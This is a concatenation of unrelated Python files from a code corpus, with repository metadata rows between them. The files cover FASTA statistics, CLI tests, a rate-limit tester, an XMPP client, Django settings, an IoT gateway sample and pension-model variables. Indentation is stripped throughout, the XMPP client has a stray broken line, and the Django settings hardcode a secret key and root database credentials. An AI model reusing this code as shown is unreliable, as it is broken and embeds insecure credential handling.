elif len(seq)==1:
linebases, linebytes = len(seq[0].strip()), len(seq[0])
# handle empty sequences https://github.com/lpryszcz/redundans/issues/13
else:
linebases, linebytes = 60, 61 #len(seq[0].strip()), len(seq[0])
seq = "".join(s.strip() for s in seq)
seqlen = len(seq)
self.genomeSize += seqlen
# count ACGT
bases = {'A': 0, 'C': 0, 'G': 0, 'T': 0, 'N': 0}
for b in seq.upper():
if b in bases:
try:
bases[b] += 1
except:
errors += 1
return (seqlen, offset, linebases, linebytes, \
bases['A'], bases['C'], bases['G'], bases['T'])
def sort(self, reverse=1, minLength=0, genomeFrac=0):
"""Return list of contigs sorted by descending size (reverse=1).
The list of returned contigs can be limited by:
- minLength - return contigs longer than bases [0]
- genomeFrac - return the longest contigs until genomeFrac is reached [all]
"""
# get all contigs
contigs = self.id2stats.keys()
contigi = len(contigs)
# filter by contig length
if minLength:
contigs = filter(lambda x: self.id2stats[x][0]>=minLength, self.id2stats)
# sort by descending size
sorted_contigs = sorted(contigs, key=lambda x: self.id2stats[x][0], reverse=reverse)
# filter longest contigs by genome fraction
if genomeFrac:
totsize = 0
for contigi, c in enumerate(sorted_contigs, 1):
totsize += self.id2stats[c][0]
if totsize >= genomeFrac*self.genomeSize:
break
return sorted_contigs[:contigi]
def get_N_and_L(self, genomeFrac=0.5, return_L=False, genomeSize=None):
"""Return N50 (and L50 if return_L) of given FastA.
- genomeFrac - calculate N (and L) for this fraction of genome [0.5 for N50 & L50]
- return NL - return N50 (contig size) and L50 (number of contigs) [False]
- genomeSize - if provided, it will use this size of the genome
instead of size of give assembly
"""
if not genomeSize:
genomeSize = self.genomeSize
# parse contigs by descending size
totsize = 0
for i, x in enumerate(sorted(self.id2stats.itervalues(), reverse=True), 1):
size = x[0]
totsize += size
if totsize >= genomeFrac*genomeSize:
break
# return N & L
if return_L:
return size, i
# return just N
return size
def N90(self):
"""Return N90"""
return self.get_N_and_L(0.9)
def L90(self):
"""Return N90"""
return self.get_N_and_L(0.9, return_L=True)[1]
def N50(self):
"""Return N90"""
return self.get_N_and_L()
def L50(self):
"""Return N90"""
return self.get_N_and_L(return_L=True)[1]
def GC(self):
"""Return GC and number of Ns"""
# catch errors ie. empty files
#if len(basecounts) != 4:
# return "%s\t[ERROR] Couldn't read file content\n"%handle.name
(A, C, G, T) = self.basecounts
GC = 100.0*(G + C) / sum(self.basecounts)
return GC
def stats(self):
"""Return FastA statistics aka fasta_stats"""
if not self.id2stats:
return "[WARNING] No entries found!\n"
longest = max(stats[0] for stats in self.id2stats.itervalues())
lengths1000 = [x[0] for x in self.id2stats.itervalues() if x[0]>=1000]
contigs1000 = len(lengths1000)
_line = '%s\t%s\t%s\t%.3f\t%s\t%s\t%s\t%s\t%s\t%s\n'
line = _line % (self.fasta, len(self), self.genomeSize, self.GC(), contigs1000, sum(lengths1000),
self.N50(), self.N90(), self.Ns, longest)
return line
def main():
import argparse
usage = "%(prog)s -i " #usage=usage,
parser = argparse.ArgumentParser(description=desc, epilog=epilog, \
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='0.11c')
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="verbose")
parser.add_argument("-i", "--fasta", type=file,
help="FASTA file(s)")
parser.add_argument("-o", "--out", default=sys.stdout, type=argparse.FileType('w'),
help="output stream [stdout]")
parser.add_argument("-r", "--regions", nargs='*', default=[],
help="contig(s) or contig region(s) to output (returns reverse complement if end larger than start)")
parser.add_argument("-N", default=0, type=int,
help="calculate NXX and exit ie N50")
parser.add_argument("-L", default=0, type=int,
help="calculate LXX and exit ie L50")
parser.add_argument("-S", "--stats", default=False, action="store_true",
help="return FastA stats aka fasta_stats")
o = parser.parse_args()
# print help if no parameters
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if o.verbose:
sys.stderr.write("Options: %s\n"%str(o))
# init faidx
faidx = FastaIndex(o.fasta, o.verbose)
# report N & L
if o.N:
o.out.write("%s\n"%faidx.get_N_and_L(o.N/100.))
if o.L:
o.out.write("%s\n"%faidx.get_N_and_L(o.L/100., return_L=True)[1])
# fasta_stats
if o.stats:
o.out.write(faidx.stats())
# report regions
for region in o.regions:
o.out.write(faidx.get_fasta(region))
if __name__=='__main__':
t0 = datetime.now()
try:
main()
except KeyboardInterrupt:
sys.stderr.write("\nCtrl-C pressed! \n")
except IOError as e:
sys.stderr.write("I/O error({0}): {1}\n".format(e.errno, e.strerror))
#[Errno 95] Operation not supported
except OSError:
sys.stderr.write("OS error({0}): {1}\n".format(e.errno, e.strerror))
dt = datetime.now()-t0
sys.stderr.write("#Time elapsed: %s\n"%dt)
| gpl-3.0 | 3,183,129,728,090,957,000 | 38.097087 | 125 | 0.532688 | false | 3.774783 | false | false | false |
dmtucker/ogre | ogre/test/test_cli.py | 1 | 1995 | # coding: utf-8
"""Tests for ogre.cli"""
from __future__ import absolute_import
import random
import pytest
import ogre.cli
@pytest.fixture
def source():
"""Return a valid source."""
return random.choice(['twitter'])
# pylint: disable=redefined-outer-name
def test___main__():
"""Test python -m functionality."""
with pytest.raises(SystemExit) as excinfo:
import ogre.__main__ # pylint: disable=redefined-outer-name, unused-variable
assert excinfo.value != 0
def test_empty():
"""Test invocation with no arguments."""
with pytest.raises(SystemExit) as excinfo:
ogre.cli.main()
assert excinfo.value != 0
def test_no_credentials(source):
"""Test an invocation without API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source])
assert excinfo.value != 0
def test_invalid_keys(source):
"""Test an invocation with invalid API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--keys', 'invalid'])
assert excinfo.value != 0
def test_invalid_location(source):
"""Test an invocation with an invalid location."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-l', '0', '0', 'invalid', 'km'])
assert excinfo.value != 0
def test_invalid_interval(source):
"""Test an invocation with an invalid interval."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-i', '0', 'invalid'])
assert excinfo.value != 0
def test_invalid_limit(source):
"""Test an invocation with an invalid limit."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--limit', 'invalid'])
assert excinfo.value != 0
def test_invalid_log(source):
"""Test an invocation with an invalid log."""
with pytest.raises(AttributeError) as excinfo:
ogre.cli.main(['-s', source, '--log', 'invalid'])
assert excinfo.value != 0
| lgpl-2.1 | -5,412,784,920,642,356,000 | 25.6 | 85 | 0.646617 | false | 3.814532 | true | false | false |
jonanone/APIProject | vagrant/rate_limit/tester.py | 1 | 1220 | from __future__ import division
from time import sleep
import httplib2
import json
h = httplib2.Http()
url = raw_input("Please enter the uri you want to access, \n"
"If left blank the connection will be set to "
"'http://localhost:5000/rate-limited': ")
if url == '':
url = 'http://localhost:5000/rate-limited'
req_per_minute = float(raw_input("Please specify the number "
"of requests per minute: "))
interval = (60.0 / req_per_minute)
def SendRequests(url, req_per_minute):
requests = 0
while requests < req_per_minute:
result = json.loads(h.request(url, 'GET')[1])
# result = h.request(url,'GET')[1]
# print result
if result.get('error') is not None:
print "Error #%s : %s" % (result.get('error'), result.get('data'))
print "Hit rate limit. Waiting 5 seconds and trying again..."
sleep(5)
SendRequests(url, req_per_minute)
else:
print "Number of Requests: ", requests+1
print result.get('response')
requests = requests + 1
sleep(interval)
print "Sending Requests..."
SendRequests(url, req_per_minute)
| mit | -2,319,813,114,321,841,700 | 30.282051 | 78 | 0.585246 | false | 3.8125 | false | false | false |
CuonDeveloper/cuon | cuon_client/Client/CUON/cuon/Chat/xmpp_client.py | 3 | 4029 | # -*- coding: utf-8 -*-
##Copyright (C) [2009] [Jürgen Hamel, D-32584 Löhne]
##This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as
##published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
##This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
##warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
##for more details.
##You should have received a copy of the GNU General Public License along with this program; if not, write to the
##Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#from twisted.web import xmlrpc
import sys,os,string,threading,time,curses
from time import strftime
import xmlrpclib
from twisted.internet.protocol import Protocol
from twisted.words.protocols.jabber import client, jid, xmlstream
from twisted.words.xish import domish
from twisted.words.xish.domish import Element
from cuon.TypeDefs.constants import constants
import time
import shelve
class xmpp_client(constants):
def __init__(self, userjid, password):
constants.__init__(self)
self.filename = 'dic_jabberusers'
self.me = jid.JID(userjid)
self.juser = userjid
self.factory = client.basicClientFactory(self.me, password)
#self.Server = xmlrpclib.ServerProxy(self.XMLRPC_PROTO + '://' + self.XMLRPC_HOST + ':' + `self.XMLRPC_PORT`)
self.theXmlstream = None
self.dicUsers = {}
self.factory.addBootstrap('//event/stream/authd',self.authd)
# Authorized
def authd(self, xmlstream):
# need to send presence so clients know we're
# actually online.
print 'start authd'
presence = domish.Element(('jabber:client', 'presence'))
presence.addElement('status').addContent('Online')
self.theXmlstream = xmlstream
self.theXmlstream.send(presence)
self.theXmlstream.addObserver('/message', self.gotMessage)
print 'new xmlstream = ', self.theXmlstream
def create_reply(self, elem):
""" switch the 'to' and 'from' attributes to reply to this element """
# NOTE - see domish.Element class to view more methods
msg_frm = elem['from']
msg_to = elem['to']
message = domish.Element(('jabber:client','message'))
message["to"] = msg_frm
message["from"] = msg_to
message["type"] = "chat"
return message
def buildProtocol(self, addr):
print 'Connected.'
return Echo()
def send(self, to, body, subject=None, mtype=None, delay=None):
print 'start sending'
el = Element((None, "message"))
el.attributes["to"] = to
el.attributes["from"] = self.juser
el.attributes["id"] = '111111'
if(subject):
subj = el.addElement("subject")
subj.addContent(subject)
if(mtype):
el.attributes["type"] = mtype
if(delay):
x = el.addElement("x")
x.attributes["xmlns"] = "jabber:x:delay"
x.attributes["from"] = fro
x.attributes["stamp"] = delay
b = el.addElement("body")
b.addContent(body)
self.theXmlstream.send(el)
print 'done sending'
def gotMessage(self, message):
# sorry for the __str__(), makes unicode happy
print u"from1: %s" % message["from"]
send_from = message["from"].strip()
self.displayMessage(send_from, message)
def displayMessage(self, send_from, message):
password
def getTime(self):
return time.strftime(self.liTimes['hour24'],time.localtime())
| gpl-3.0 | -636,960,826,041,465,300 | 32.840336 | 126 | 0.610628 | false | 4.07179 | false | false | false |
aprefontaine/TMScheduler | userprefs/views.py | 1 | 2273 | from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.template import Context, loader
from google.appengine.api import users
from userprefs.models import *
from clubs.models import Club
import logging
def index(request):
user = users.get_current_user()
club = None
phone = ""
if not user:
auth_url = users.create_login_url(request.path + '/prefs')
else:
auth_url = users.create_logout_url(request.path)
userPrefs = get_userprefs(user.user_id())
logging.info('userPrefs index: get_userprefs returns %s' % userPrefs)
if userPrefs:
logging.info('userPrefs: %s' % (userPrefs,))
club = userPrefs.club
phone = userPrefs.phone
else:
# should we ever get here? We should always get a userPref but version of prefs may be 0.
logging.info('userPrefs: no record yet. Why here??')
clubList = Club.objects.all().order_by('Number')
t = loader.get_template('userprefs/index.html')
c = RequestContext(request, {
'user': user,
'auth_url': auth_url,
'club': club,
'phone': phone,
'clubList' : clubList
})
return HttpResponse(t.render(c))
def update(request):
try:
user = users.get_current_user()
clubNumber = request.POST['clubNumber']
phoneNumber = request.POST['phoneNumber']
except ():
#
return render_to_response('prefs/index.html', {
'error_message': "Prefs update failed.",
}, context_instance=RequestContext(request))
else:
logging.info('Save UserPrefs: club=['+clubNumber+'], phoneNumber=['+phoneNumber+'], gid=['+user.user_id()+']')
newUserPrefs = UserPrefs(version=1,club=clubNumber,phone=phoneNumber,googleOpenId=user.user_id())
newUserPrefs.save()
# messages.success(request, 'Add')
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('userprefs.views.index'))
# return HttpResponse('Test') | bsd-3-clause | -8,334,347,202,004,104,000 | 38.894737 | 118 | 0.646282 | false | 3.859083 | false | false | false |
mantidproject/mantid | scripts/Diffraction/isis_powder/hrpd_routines/hrpd_advanced_config.py | 3 | 2689 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from isis_powder.hrpd_routines.hrpd_enums import HRPD_TOF_WINDOWS
absorption_correction_params = {
"cylinder_sample_height": 2.0,
"cylinder_sample_radius": 0.3,
"cylinder_position": [0., 0., 0.],
"chemical_formula": "V"
}
# Default cropping values are 5% off each end
window_10_50_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_10_110_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_30_130_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_100_200_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_180_280_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
file_names = {
"vanadium_peaks_masking_file": "VanaPeaks.dat",
"grouping_file_name": "hrpd_new_072_01_corr.cal",
"nxs_filename": "{instlow}{runno}{_fileext}{suffix}.nxs",
"gss_filename": "{instlow}{runno}{_fileext}{suffix}.gss",
"dat_files_directory": "dat_files",
"tof_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_TOF.dat",
"dspacing_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_D.dat",
}
general_params = {
"spline_coefficient": 70,
"focused_bin_widths": [
-0.0003, # Bank 1
-0.0007, # Bank 2
-0.0012 # Bank 3
],
"mode": "coupled"
}
def get_all_adv_variables(tof_window=HRPD_TOF_WINDOWS.window_10_110):
advanced_config_dict = {}
advanced_config_dict.update(file_names)
advanced_config_dict.update(general_params)
advanced_config_dict.update(get_tof_window_dict(tof_window=tof_window))
return advanced_config_dict
def get_tof_window_dict(tof_window):
if tof_window == HRPD_TOF_WINDOWS.window_10_50:
return window_10_50_params
if tof_window == HRPD_TOF_WINDOWS.window_10_110:
return window_10_110_params
if tof_window == HRPD_TOF_WINDOWS.window_30_130:
return window_30_130_params
if tof_window == HRPD_TOF_WINDOWS.window_100_200:
return window_100_200_params
if tof_window == HRPD_TOF_WINDOWS.window_180_280:
return window_180_280_params
raise RuntimeError("Invalid time-of-flight window: {}".format(tof_window))
| gpl-3.0 | -1,890,241,532,106,708,500 | 31.39759 | 84 | 0.656006 | false | 2.716162 | false | false | false |
garaud/ezhc | ezhc/sample.py | 1 | 2116 |
import os
import numpy as np
import pandas as pd
from _config import SAMPLES_DIR, DF_ONE_IDX_SEVERAL_COL, DF_ONE_IDX_SEVERAL_COL_2, \
DF_ONE_IDX_ONE_COL, DF_ONE_IDX_TWO_COL, DF_TWO_IDX_ONE_COL, DF_SCATTER, \
DF_BUBBLE, DF_HEATMAP, DF_SEVERAL_IDX_ONE_COL
def load_df(src):
_dir = os.path.dirname(__file__)
df_file = os.path.join(_dir, SAMPLES_DIR, src)
df = pd.read_csv(df_file)
return df
def df_timeseries(N=3, Nb_bd=100, seed=123456):
np.random.seed(seed)
rate = 0.02
vol = 0.25
dt = 1.0/260
tracks = np.zeros([Nb_bd, N], dtype=np.float)
for k in range(N):
ln_returns = (rate-vol**2/2)*dt+vol*np.sqrt(dt)*np.random.normal(size=Nb_bd)
ln_returns[0] = 0.0
tracks[:, k] = np.exp(ln_returns).cumprod()
dates = pd.date_range(start=pd.datetime(2015, 1, 1), periods=Nb_bd, freq='B')
df = pd.DataFrame(data=tracks, index=dates, columns=['Track'+str(1+i) for i in range(N)])
return df
def df_one_idx_several_col():
df = load_df(DF_ONE_IDX_SEVERAL_COL)
df = df.set_index('Fruit')
return df
def df_one_idx_several_col_2():
df = load_df(DF_ONE_IDX_SEVERAL_COL_2)
df = df.set_index('WeekDay')
return df
def df_one_idx_one_col():
df = load_df(DF_ONE_IDX_ONE_COL)
df = df.set_index('Brand')
return df
def df_one_idx_two_col():
df = load_df(DF_ONE_IDX_TWO_COL)
df = df.set_index('Month')
return df
def df_two_idx_one_col():
df = load_df(DF_TWO_IDX_ONE_COL)
df = df.set_index(['Brand', 'Version'])
return df
def df_scatter():
df = load_df(DF_SCATTER)
df = df.set_index(['Height', 'Weight'])
return df
def df_bubble():
df = load_df(DF_BUBBLE)
df = df.set_index(['Cat', 'x', 'y'])
return df
def df_heatmap():
df = load_df(DF_HEATMAP)
df = df.set_index(['Name', 'Day'])
return df
def df_several_idx_one_col():
df = load_df(DF_SEVERAL_IDX_ONE_COL)
df = df.set_index(['Region', 'Country', 'Cause'])
df = df.sortlevel()
return df
| mit | -2,835,475,829,766,355,500 | 21.752688 | 109 | 0.576087 | false | 2.602706 | false | false | false |
FilipeMaia/afnumpy | afnumpy/core/multiarray.py | 1 | 4723 | import numpy
import afnumpy
import arrayfire
from .. import private_utils as pu
from ..decorators import *
def fromstring(string, dtype=float, count=-1, sep=''):
return array(numpy.fromstring(string, dtype, count, sep))
def array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0):
# We're going to ignore this for now
# if(subok is not False):
# raise NotImplementedError
if(order is not None and order is not 'K' and order is not 'C'):
raise NotImplementedError
# If it's not a numpy or afnumpy array first create a numpy array from it
if(not isinstance(object, afnumpy.ndarray) and
not isinstance(object, numpy.ndarray) and
not isinstance(object, arrayfire.array.Array)):
object = numpy.array(object, dtype=dtype, copy=copy, order=order, subok=subok, ndmin=ndmin)
if isinstance(object, arrayfire.array.Array):
shape = pu.c2f(object.dims())
else:
shape = object.shape
while(ndmin > len(shape)):
shape = (1,)+shape
if(dtype is None):
if isinstance(object, arrayfire.array.Array):
dtype = pu.typemap(object.dtype())
else:
dtype = object.dtype
if(isinstance(object, afnumpy.ndarray)):
if(copy):
s = arrayfire.cast(object.d_array.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object.d_array, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, arrayfire.array.Array)):
if(copy):
s = arrayfire.cast(object.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, numpy.ndarray)):
return afnumpy.ndarray(shape, dtype=dtype, buffer=numpy.ascontiguousarray(object.astype(dtype, copy=copy)))
else:
raise AssertionError
def arange(start, stop = None, step = None, dtype=None):
return afnumpy.array(numpy.arange(start,stop,step,dtype))
def empty(shape, dtype=float, order='C'):
return afnumpy.ndarray(shape, dtype=dtype, order=order)
def zeros(shape, dtype=float, order='C'):
b = numpy.zeros(shape, dtype, order)
return afnumpy.ndarray(b.shape, b.dtype, buffer=b,order=order)
def where(condition, x=pu.dummy, y=pu.dummy):
a = condition
s = arrayfire.where(a.d_array)
# numpy uses int64 while arrayfire uses uint32
s = afnumpy.ndarray(pu.af_shape(s), dtype=numpy.uint32, af_array=s).astype(numpy.int64)
# Looks like where goes through the JIT??
s.eval()
if(x is pu.dummy and y is pu.dummy):
idx = []
mult = 1
for i in a.shape[::-1]:
mult = i
idx = [s % mult] + idx
s //= mult
idx = tuple(idx)
return idx
elif(x is not pu.dummy and y is not pu.dummy):
if(x.dtype != y.dtype):
raise TypeError('x and y must have same dtype')
if(x.shape != y.shape):
raise ValueError('x and y must have same shape')
ret = afnumpy.array(y)
if(len(ret.shape) > 1):
ret = ret.flatten()
ret[s] = x.flatten()[s]
ret = ret.reshape(x.shape)
else:
ret[s] = x[s]
return ret;
else:
raise ValueError('either both or neither of x and y should be given')
def concatenate(arrays, axis=0):
arrays = tuple(arrays)
if len(arrays) == 0:
raise ValueError('need at least one array to concatenate')
base = arrays[0]
if len(arrays) == 1:
return base.copy()
# arrayfire accepts at most 4 arrays to concatenate at once so we'll have
# to chunk the arrays
# The first case is special as we don't want to create unnecessary copies
i = 0
a = arrays[i].d_array
if i+1 < len(arrays):
b = arrays[i+1].d_array
else:
b = None
if i+2 < len(arrays):
c = arrays[i+2].d_array
else:
c = None
if i+3 < len(arrays):
d = arrays[i+3].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
for i in range(4,len(arrays),4):
a = ret.d_array
if i < len(arrays):
b = arrays[i].d_array
else:
b = None
if i+1 < len(arrays):
c = arrays[i+1].d_array
else:
c = None
if i+2 < len(arrays):
d = arrays[i+2].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
return ret
| bsd-2-clause | 26,260,496,238,726,344 | 32.496454 | 115 | 0.583739 | false | 3.45754 | false | false | false |
Lokesh-K-Haralakatta/iot-python | samples/managedGateway/simpleManagedGateway.py | 1 | 3793 | # *****************************************************************************
# Copyright (c) 2016 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Amit M Mangalvedkar - Initial Contribution
# *****************************************************************************
import getopt
import time
import sys
import psutil
import platform
import json
import signal
import subprocess
from uuid import getnode as get_mac
try:
import ibmiotf.gateway
except ImportError:
# This part is only required to run the sample from within the samples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import ibmiotf"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import ibmiotf.gateway
def interruptHandler(signal, frame):
client.disconnect()
sys.exit(0)
def commandProcessor(cmd):
print("Command received: %s" % cmd.data)
if __name__ == "__main__":
signal.signal(signal.SIGINT, interruptHandler)
organization = "org_id"
gatewayType = "MY GATEWAY TYPE"
gatewayId = "MY GATEWAY ID"
gatewayName = platform.node()
authMethod = "token"
authToken = "MASKED PASSWORD"
configFilePath = None
# Seconds to sleep so as to check the error state
interval = 20
client = None
simpleGatewayInfo = ibmiotf.gateway.DeviceInfo()
simpleGatewayInfo.description = gatewayName
simpleGatewayInfo.deviceClass = platform.machine()
simpleGatewayInfo.manufacturer = platform.system()
simpleGatewayInfo.fwVersion = platform.version()
simpleGatewayInfo.hwVersion = None
simpleGatewayInfo.model = None
simpleGatewayInfo.serialNumber = None
options = {"org": organization, "type": gatewayType, "id": gatewayId, "auth-method": authMethod, "auth-token": authToken}
try:
#By default the client is an unmanaged client and on disconnecting it again becomes unmanaged
#Thats why we need to make it a managed gateway
client = ibmiotf.gateway.ManagedGateway(options, logHandlers=None, deviceInfo=simpleGatewayInfo)
client.commandCallback = commandProcessor
client.connect()
# manage() method sends request to DM server to make the device a managed device
client.manage(3600, supportDeviceActions=True, supportFirmwareActions=True).wait()
except ibmiotf.ConfigurationException as e:
print(str(e))
sys.exit()
except ibmiotf.UnsupportedAuthenticationMethod as e:
print(str(e))
sys.exit()
except ibmiotf.ConnectionException as e:
print(str(e))
sys.exit()
# Initiate DM action to update the geo location of the device, but don't wait (async) for it to complete
client.setLocation(longitude=85, latitude=85, accuracy=100)
print("Location has been set")
# Make a GET call to https://orgid.internetofthings.ibmcloud.com/api/v0002/device/types/{gateway type}/devices/{gateway id}/location to test
# Initiate DM action to set error codes to 1, wait for it to be completed (sync) and then clear all error codes
client.setErrorCode(1).wait(10)
print("Error code setting returned back")
time.sleep(interval)
client.clearErrorCodes()
client.disconnect()
print("(Press Ctrl+C to disconnect)")
| epl-1.0 | -2,711,714,358,018,347,500 | 33.171171 | 144 | 0.674927 | false | 4.096112 | false | false | false |
dumoulinj/ers | ers_backend/ers_backend/settings.py | 1 | 4824 | """
Django settings for project ers_backend.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ul2)0@*k-3snu(fijr8)9t1ozwuk3&4wmp_l=uikt426boodl@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# REST API
'rest_framework',
'rest_framework_swagger',
'corsheaders',
# Tests
'testing',
'model_mommy',
# Websockets
'swampdragon',
# Help
'annoying',
# Apps
'dataset_manager',
'video_processor',
'arousal_modeler',
'timeframe_annotator',
'emotion_annotator'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ers_backend.urls'
WSGI_APPLICATION = 'ers_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'dataset_manager': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'video_processor': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'ers_backend': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
}
}
}
# REST
CORS_ORIGIN_WHITELIST = (
'http://localhost:3333'
)
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'X-CSRFToken'
)
CORS_ALLOW_CREDENTIALS = True
REST_FRAMEWORK = {
'UNICODE_JSON': False,
}
# Swampdragon
SWAMP_DRAGON_CONNECTION = ('swampdragon.connections.sockjs_connection.DjangoSubscriberConnection', '/data')
DRAGON_URL = 'http://localhost:9999/'
# Celery
USE_CELERY = True
BROKER_URL = 'redis://localhost:6379/1'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'ers_backend_db',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '', # If mamp under OS X: /Applications/MAMP/tmp/mysql/mysql.sock
'PORT': '',
}
}
# Modify PATH if under OS X to have access to libraries such as ffmpeg
#os.environ["PATH"] += os.pathsep + os.pathsep.join(["/opt/local/bin", "/usr/local/bin"])
# Constants
VIDEO_EXTENSIONS = ("avi", "mkv", "mov", "mp4", "m4v", "mpeg", "mpg", "wmv")
DATASET_DEFAULT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'datasets'))
WEBCLIENT_VIDEOS_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'ers_frontend/_public/datasets/$datasetId$/videos'))
| mit | 912,146,412,908,303,500 | 24.256545 | 151 | 0.628939 | false | 3.35 | false | false | false |
openfisca/openfisca-tunisia-pension | openfisca_tunisia_pension/model/data.py | 1 | 2273 | # -*- coding: utf-8 -*-
from openfisca_tunisia_pension.model.base import *
# raic -> raci
# Socio-economic data
# Donnée d'entrée de la simulation à fournir à partir d'une enquète ou
# à générer avec un générateur de cas type
class date_naissance(Variable):
value_type = date
default_value = date(1970, 1, 1)
entity = Individu
label = u"Date de naissance"
definition_period = ETERNITY
class salaire(Variable):
value_type = float
entity = Individu
label = u"Salaires"
definition_period = YEAR
class age(Variable):
value_type = int
entity = Individu
label = u"Âge"
definition_period = YEAR
class trimestres_valides(Variable):
value_type = int
entity = Individu
label = u"Nombre de trimestres validés"
definition_period = YEAR
class TypesRegimeSecuriteSociale(Enum):
__order__ = 'rsna rsa rsaa rtns rtte re rtfr raci salarie_cnrps pensionne_cnrps'
# Needed to preserve the enum order in Python 2
rsna = u"Régime des Salariés Non Agricoles"
rsa = u"Régime des Salariés Agricoles"
rsaa = u"Régime des Salariés Agricoles Amélioré"
rtns = u"Régime des Travailleurs Non Salariés (secteurs agricole et non agricole)"
rtte = u"Régime des Travailleurs Tunisiens à l'Etranger"
re = u"Régime des Etudiants, diplômés de l'enseignement supérieur et stagiaires"
